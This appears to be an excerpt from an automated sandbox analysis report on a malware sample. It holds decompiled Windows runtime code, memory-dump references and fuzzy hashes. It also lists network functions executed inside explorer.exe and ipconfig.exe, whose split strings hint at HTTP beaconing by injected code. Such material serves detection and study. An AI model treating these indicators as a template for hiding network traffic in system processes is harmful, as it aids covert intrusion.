                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 00932328
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 0093230B
                                                                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009322FC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-871070163
                                                                                                                                                                                                          • Opcode ID: 59bd22401caa4b1d2ef85672f180e783ffd18d641fde067613f302d2e9ca512a
                                                                                                                                                                                                          • Instruction ID: d776d7be6ff3b8cd9a7478f031e79e02a2b3e199cb88dfd87e571eb828b5f716
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59bd22401caa4b1d2ef85672f180e783ffd18d641fde067613f302d2e9ca512a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 855125716006056BEB149B3DDC81FA773ACEF95760F104229FE15DB381EA75EC418BA0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008FEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                          			E008FEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E008EDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x9b793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E008D16C0(_t39);
				} else {
					_t40 = E008CF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00913915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E008D01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x9b793c; // 0x0
								_push(_t85);
								_t44 = E008D1F28(_t71);
							} else {
								_t44 = E008CF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00913915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00952306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E008FEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00914FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00923F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00923F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9b20c0;
								if(_t85 != 0x9b20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0095217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00923F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                                                                          0x008fec56
                                                                                                                                                                                                          0x008fec56
                                                                                                                                                                                                          0x008fec56
                                                                                                                                                                                                          0x008fec5c
                                                                                                                                                                                                          0x008fec64
                                                                                                                                                                                                          0x009323e6
                                                                                                                                                                                                          0x009323eb
                                                                                                                                                                                                          0x009323eb
                                                                                                                                                                                                          0x008fec6a
                                                                                                                                                                                                          0x008fec6c
                                                                                                                                                                                                          0x008fec6f
                                                                                                                                                                                                          0x009323f3
                                                                                                                                                                                                          0x009323f8
                                                                                                                                                                                                          0x009323fa
                                                                                                                                                                                                          0x009323fc
                                                                                                                                                                                                          0x008fec75
                                                                                                                                                                                                          0x008fec76
                                                                                                                                                                                                          0x008fec76
                                                                                                                                                                                                          0x008fec7b
                                                                                                                                                                                                          0x008fec7c
                                                                                                                                                                                                          0x008fec7e
                                                                                                                                                                                                          0x00932406
                                                                                                                                                                                                          0x00932407
                                                                                                                                                                                                          0x0093240c
                                                                                                                                                                                                          0x0093240d
                                                                                                                                                                                                          0x0093240d
                                                                                                                                                                                                          0x0093240d
                                                                                                                                                                                                          0x00932414
                                                                                                                                                                                                          0x00932417
                                                                                                                                                                                                          0x0093241e
                                                                                                                                                                                                          0x00932435
                                                                                                                                                                                                          0x00932438
                                                                                                                                                                                                          0x0093243c
                                                                                                                                                                                                          0x0093243f
                                                                                                                                                                                                          0x00932442
                                                                                                                                                                                                          0x00932443
                                                                                                                                                                                                          0x00932446
                                                                                                                                                                                                          0x00932449
                                                                                                                                                                                                          0x00932453
                                                                                                                                                                                                          0x00932455
                                                                                                                                                                                                          0x0093245b
                                                                                                                                                                                                          0x0093245b
                                                                                                                                                                                                          0x008feb99
                                                                                                                                                                                                          0x008feb99
                                                                                                                                                                                                          0x008feb9c
                                                                                                                                                                                                          0x008feb9d
                                                                                                                                                                                                          0x008feb9f
                                                                                                                                                                                                          0x008feba2
                                                                                                                                                                                                          0x00932465
                                                                                                                                                                                                          0x0093246b
                                                                                                                                                                                                          0x0093246d
                                                                                                                                                                                                          0x008feba8
                                                                                                                                                                                                          0x008feba9
                                                                                                                                                                                                          0x008feba9
                                                                                                                                                                                                          0x008febae
                                                                                                                                                                                                          0x008febb3
                                                                                                                                                                                                          0x008febb9
                                                                                                                                                                                                          0x008febbb
                                                                                                                                                                                                          0x00932513
                                                                                                                                                                                                          0x00932514
                                                                                                                                                                                                          0x00932519
                                                                                                                                                                                                          0x0093251b
                                                                                                                                                                                                          0x008fec2a
                                                                                                                                                                                                          0x008fec2d
                                                                                                                                                                                                          0x008fec33
                                                                                                                                                                                                          0x008fec36
                                                                                                                                                                                                          0x008fec3a
                                                                                                                                                                                                          0x008fec3e
                                                                                                                                                                                                          0x008fec40
                                                                                                                                                                                                          0x008fec47
                                                                                                                                                                                                          0x008fec47
                                                                                                                                                                                                          0x008fec40
                                                                                                                                                                                                          0x008d22c6
                                                                                                                                                                                                          0x008febc1
                                                                                                                                                                                                          0x008febc1
                                                                                                                                                                                                          0x008febc5
                                                                                                                                                                                                          0x008fec9a
                                                                                                                                                                                                          0x008fec9a
                                                                                                                                                                                                          0x008febd6
                                                                                                                                                                                                          0x008febd6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008febbb
                                                                                                                                                                                                          0x00932477
                                                                                                                                                                                                          0x0093247c
                                                                                                                                                                                                          0x00932486
                                                                                                                                                                                                          0x0093248b
                                                                                                                                                                                                          0x00932496
                                                                                                                                                                                                          0x0093249b
                                                                                                                                                                                                          0x0093249d
                                                                                                                                                                                                          0x009324a0
                                                                                                                                                                                                          0x009324a3
                                                                                                                                                                                                          0x009324aa
                                                                                                                                                                                                          0x009324aa
                                                                                                                                                                                                          0x009324a5
                                                                                                                                                                                                          0x009324a5
                                                                                                                                                                                                          0x009324a5
                                                                                                                                                                                                          0x009324ac
                                                                                                                                                                                                          0x009324af
                                                                                                                                                                                                          0x009324b0
                                                                                                                                                                                                          0x009324b3
                                                                                                                                                                                                          0x009324b9
                                                                                                                                                                                                          0x009324ba
                                                                                                                                                                                                          0x009324bb
                                                                                                                                                                                                          0x009324c6
                                                                                                                                                                                                          0x009324cb
                                                                                                                                                                                                          0x009324cd
                                                                                                                                                                                                          0x009324d0
                                                                                                                                                                                                          0x009324d1
                                                                                                                                                                                                          0x009324d4
                                                                                                                                                                                                          0x009324d6
                                                                                                                                                                                                          0x009324d9
                                                                                                                                                                                                          0x009324d9
                                                                                                                                                                                                          0x009324dc
                                                                                                                                                                                                          0x009324df
                                                                                                                                                                                                          0x009324e1
                                                                                                                                                                                                          0x009324e7
                                                                                                                                                                                                          0x009324e9
                                                                                                                                                                                                          0x009324ec
                                                                                                                                                                                                          0x009324ef
                                                                                                                                                                                                          0x009324f2
                                                                                                                                                                                                          0x009324f2
                                                                                                                                                                                                          0x009324ef
                                                                                                                                                                                                          0x009324e7
                                                                                                                                                                                                          0x009324fa
                                                                                                                                                                                                          0x009324ff
                                                                                                                                                                                                          0x00932501
                                                                                                                                                                                                          0x00932503
                                                                                                                                                                                                          0x00932506
                                                                                                                                                                                                          0x0093250b
                                                                                                                                                                                                          0x008feb8c
                                                                                                                                                                                                          0x008feb93
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008feb93
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008feb99
                                                                                                                                                                                                          0x008fec85
                                                                                                                                                                                                          0x008fec85
                                                                                                                                                                                                          0x008fec85
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0093248D
                                                                                                                                                                                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009324BD
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 009324FA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                                          • API String ID: 0-3177188983
                                                                                                                                                                                                          • Opcode ID: 1232d4a2079dfa96f418e58598ca892b8701b1a1754936db9aea16bc2c7bdf76
                                                                                                                                                                                                          • Instruction ID: 856a527f1ce8c5fde9ec2efe89650043451bb4926ce9085bc88321939ec7c8be
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1232d4a2079dfa96f418e58598ca892b8701b1a1754936db9aea16bc2c7bdf76
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4641D770600208BBDB20DF68DD89FAA77B9FF84720F208615F665DB3E1D634E9418B61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0090FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fassign
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3965848254-0
                                                                                                                                                                                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                                          • Instruction ID: 344cdb0f95704285d6eb9010bc8a075f5dd08f1e5e91ee035c4815966f775f30
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB916C31D0020AEFDF24DF98C8556AEB7B9FF55304F24847AD451AA6E2E7305B81CB91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Analysis Process: explorer.exe PID: 1388 Parent PID: 2876 explorer.exeCOMMON

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 0293C302, Relevance: 23.7, APIs: 3, Strings: 10, Instructions: 911networkCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: getaddrinforecvsetsockopt
                                                                                                                                                                                                          • String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
                                                                                                                                                                                                          • API String ID: 1564272048-2976227712
                                                                                                                                                                                                          • Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                                                                          • Instruction ID: 640501723da83b261ddd94bac95920f85f75d083efa04e12976ab5e5b69a1e9d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69629130618F088BC76AEB68D4947EAB7E6FB98304F50492ED49BD7242DF30A545CB81
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 02938EFE, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: closesocket
                                                                                                                                                                                                          • String ID: clos$esoc$ket
                                                                                                                                                                                                          • API String ID: 2781271927-3604069445
                                                                                                                                                                                                          • Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                                                                                                                                          • Instruction ID: 9137c2caa85c3f16a2eb5e58e9eba40ea019fffd0ceab21b505d47b8ffc6a19b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4F06D7021CB089BCBC0DF1894887A9B7E1FB99314F54056DE48DCA204CB7885428782
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 02938F02, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: closesocket
                                                                                                                                                                                                          • String ID: clos$esoc$ket
                                                                                                                                                                                                          • API String ID: 2781271927-3604069445
                                                                                                                                                                                                          • Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                                                                                                                                          • Instruction ID: ccc7fd36a661c19efbe7800734688902fe5c6d81044139777be5c32de60d3784
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF01770618B089FCBC4EF18D0C87A9B7E1FB99314F64556DB44ECA244CB7889468B82
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 02938E7E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: connect
                                                                                                                                                                                                          • String ID: conn$ect
                                                                                                                                                                                                          • API String ID: 1959786783-716201944
                                                                                                                                                                                                          • Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                                                                                                                                          • Instruction ID: ef179d687af4cf77a09852ba34abc9eb752414c65464da5fbe748bb650520297
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA012170618A088FDB94EF5CE088B15BBE0FB59314F1545AEE90DCB267CB74C8858B85
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 02938E82, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: connect
                                                                                                                                                                                                          • String ID: conn$ect
                                                                                                                                                                                                          • API String ID: 1959786783-716201944
                                                                                                                                                                                                          • Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                                                                                                                                                          • Instruction ID: d776c756f58eb6ec162fc6f242d3791b6c0a024656793b4ec80d8d21f082acfe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD014F70618A088FDB94EF5CE088B15B7E0FB58314F1545AFE80DCB227CB70C8868B81
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 02938DF7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: send
                                                                                                                                                                                                          • String ID: send
                                                                                                                                                                                                          • API String ID: 2809346765-2809346765
                                                                                                                                                                                                          • Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                                                                                                                                                          • Instruction ID: 824e0d16b6e388815745d94155690f23847a4000a90a53dd84c4cc529cc36593
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E01E170918A188FDB94EF5CE089B1577E4EB98324F1545AE984DCB266CB70D882CB82
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 02938E02, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: send
                                                                                                                                                                                                          • String ID: send
                                                                                                                                                                                                          • API String ID: 2809346765-2809346765
                                                                                                                                                                                                          • Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                                                                                                                                                          • Instruction ID: 398cac0f59f0729925cdcd2d92a142d3c915c02bf37039a9a9e3f198d894b1fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B01123061CA088FDB94EF1CE088B1577E0EB5C314F1545AE984DCB266CB70D881CB81
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 02938D02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                                          • String ID: sock
                                                                                                                                                                                                          • API String ID: 98920635-2415254727
                                                                                                                                                                                                          • Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                                                                                                                                                          • Instruction ID: e539024e4f7ecb94c5f744e8d554411d6045f082708fa09257706a2a481077c2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F012870658A188FDB84EF1CE048B14BBE0FB98314F1545AEE84DCB276C7B0C9428B86
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 02934272, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2378941868.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                          • Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                                                                                                                                                          • Instruction ID: 58b7db3ac7955a7d3cc193ac633bc4c79fbf7ce6ed91eb55dd56d627d3f104b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00218030614B4D8FDB65EF5890D43AAB3E6FB94304F4A167E8D5DCB206CB309441CB92
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Analysis Process: ipconfig.exe PID: 3020 Parent PID: 1388 ipconfig.exeCOMMON

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 01E467C7, Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 487nativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 01E4691F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375982060.0000000001E40000.00000040.00000001.sdmp, Offset: 01E40000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                          • API String ID: 1778838933-4108050209
                                                                                                                                                                                                          • Opcode ID: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
                                                                                                                                                                                                          • Instruction ID: 85bee92fb62c481add0f2cf608ec7b8b1a35fdf5281a209845f82f2e96b9d77e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAF16F70A18A8D8FDBA9EF68D894AEEB7E0FF98304F40562AD44ED7250DF349541CB41
